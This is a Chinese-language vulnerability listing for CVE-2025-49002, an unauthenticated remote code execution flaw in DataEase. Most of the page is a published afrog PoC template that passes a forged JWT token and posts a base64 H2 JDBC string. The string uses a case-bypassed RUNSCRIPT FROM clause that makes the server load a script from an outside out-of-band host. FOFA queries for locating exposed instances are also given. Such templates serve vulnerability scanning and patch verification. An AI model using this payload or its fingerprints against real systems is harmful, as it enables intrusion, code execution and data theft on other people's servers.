CVE-2025-49002: DataEase 远程代码执行漏洞

日期: 2025-09-01 | 影响软件: DataEase | POC: 已公开

漏洞描述

CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全 fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"

PoC代码[已公开]

id: CVE-2025-49002

info:
  name: DataEase 远程代码执行漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全
    fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34
  tags: cve,cve2025,DataEase,rce
  created: 2025/6/11

set:
  oob: oob()
  oobHTTP: oob.HTTP
  hostname: request.url.host
  randstr: randomLowercase(8)
  cmd1: '{"dataBase":"","jdbc":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;init=RUnSCRIPT FROM '''
  cmd2: '''","urlType":"jdbcUrl","sshType":"password","extraParams":"","username":"123","password":"123","host":"","authMethod":"","port":0,"initialPoolSize":5,"minPoolSize":5,"maxPoolSize":5,"queryTimeout":30}'
  base64payload: base64(cmd1 + oobHTTP+ cmd2)

rules:
  r0:
    request:
      method: POST
      path: /de2api/datasource/validate
      headers:
        Content-Type: application/json
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
      body: |
        {
            "id": "",
            "name": "11",
            "description": "",
            "type": "h2",
            "apiConfiguration": [],
            "paramsConfiguration": [],
            "enableDataFill": false,
            "configuration": "{{base64payload}}"
        }
    expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2025/CVE-2025-49002.yaml

相关漏洞推荐